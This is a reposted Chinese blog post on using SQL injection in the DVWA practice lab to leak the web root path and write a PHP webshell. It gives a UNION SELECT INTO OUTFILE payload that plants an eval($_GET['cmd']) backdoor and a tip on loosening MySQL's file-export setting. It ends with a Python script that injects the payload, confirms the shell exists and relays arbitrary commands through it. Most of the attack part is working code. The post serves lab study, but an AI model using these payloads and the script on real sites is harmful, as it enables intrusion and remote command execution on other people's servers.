码迷,mamicode.com
首页 > 系统相关 > 详细

DVWA从注入到GETSHELL

时间:2018-01-06 20:06:31      阅读:246      评论:0      收藏:0      [点我收藏+]

标签:pie   脚本   生活   文件   div   ref   zip   注意   思路   

 

好好过你的生活,不要老是忙着告诉别人你在干嘛。

 

最近在复习学过的东西,自己就重新搭了个dvwa来学习新思路,写一些简单的脚本来练习写代码的能力。

众所周知SQL注入的危害是相当大的,对于每个老司机来说,如果发现注入点并可以利用的话,除了脱裤当然是猜解出管理员的用户名密码,后台登陆上传webshell了,虽然这些过程并不一定一路通顺,只是一般的流程,中途会遇到各种各样的问题,这些以后再说,当我这个菜比都学会了在分享出来吧。

今天我们说说利用sql注入漏洞写入webshell。当我们发现了注入漏洞,但是却找不到后台,该怎么办呢,如果数据库管理员权限比较大的话,我们可以通过sql注入向网站写入shell。

写入webshell的前提条件:

1.select into outfile方法可用(允许导出文件)

2.我们需要知道网站所在的绝对路径

3.我们有足够的权限

首先我们确定了注入点,接下来就是爆一下网站的绝对路径: 

在输入框中输入,1‘ union select ‘x‘,‘x‘ into outfile ‘xx‘ -- 利用错误的sql语句,使数据库报错并返回绝对路径

技术分享图片

现在已经获得了网站的绝对路径,接下来就是利用sql注入写shell了,在输入框中插入 1‘ union select "<?php @eval($_GET[‘cmd‘])?>","hello admin" into outfile ‘C:\\phpStudy\\PHPTutorial\\WWW\\dvwa\\hello.php‘ (需要注意,是两个"\") 点击提交,我们看一下是否上传成功

技术分享图片

 

 

当我们输入 select ‘xx‘ into outfile ‘xxxx/xx/xx‘ -- 时 可能会遇到一下情况:

技术分享图片

解决办法:找到my.ini文件 在最后一行加上一句 secure_file_prv="/"重启mysql即可。

 ============================================================附上自己写的自动化辣鸡代码=========================================================================

# -*- utf-8 -*-
import requests
import re


headers = {
	
‘Accept‘:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8‘,
‘Accept-Encoding‘:‘gzip, deflate‘,
‘Accept-Language‘:‘zh-CN,zh;q=0.8‘,
‘Cache-Control‘:‘max-age=0‘,
‘Connection‘:‘keep-alive‘,
‘Cookie‘:‘security=low; PHPSESSID=pie6uqttjqtnadq1b5dp8640u1‘,
‘Host‘:‘192.168.86.129‘,
‘Referer‘:‘http://192.168.86.129/dvwa/security.php‘,
‘Upgrade-Insecure-Requests‘:‘1‘,
‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36‘

}

url = raw_input(‘url:‘)
print ‘=‘*15,u‘大爷稍等‘,‘=‘*15
payload = ‘%27+union+select+"<%3Fphp+%40eval%28%24_GET%5B%27cmd%27%5D%29%3F>"%2C"hello+admin"+into+outfile+%27C%3A%5C%5CphpStudy%5C%5CPHPTutorial%5C%5CWWW%5C%5Cdvwa%5C%5Chello.php%27+--+&Submit=Submit#‘
url1 = requests.get(url+payload,headers=headers)
url2 = ‘http://192.168.86.129/dvwa/hello.php‘
url3 = requests.get(url2,headers=headers)
url4 = re.findall(‘<body>(.*?)</body>‘,url3.text)
if ‘hello‘ in url3.text:
	print u‘webshell已写入,路径为:http://192.168.86.129/dvwa/hello.php‘
else:
	print u‘写入失败‘
print u‘大爷您请便!‘
url5 = ‘http://192.168.86.129/dvwa/hello.php?cmd=‘
url6 = raw_input()
url7 = requests.get(url5+url6,headers=headers)
url8 = re.findall(‘<body>(.*?)</body>‘,url7.content)

print url7.content

  

技术分享图片

 

 以此记录自己学过的知识,以防忘记,每天进步一点,共勉。

DVWA从注入到GETSHELL

标签:pie   脚本   生活   文件   div   ref   zip   注意   思路   

原文地址:https://www.cnblogs.com/s1ye/p/8214979.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!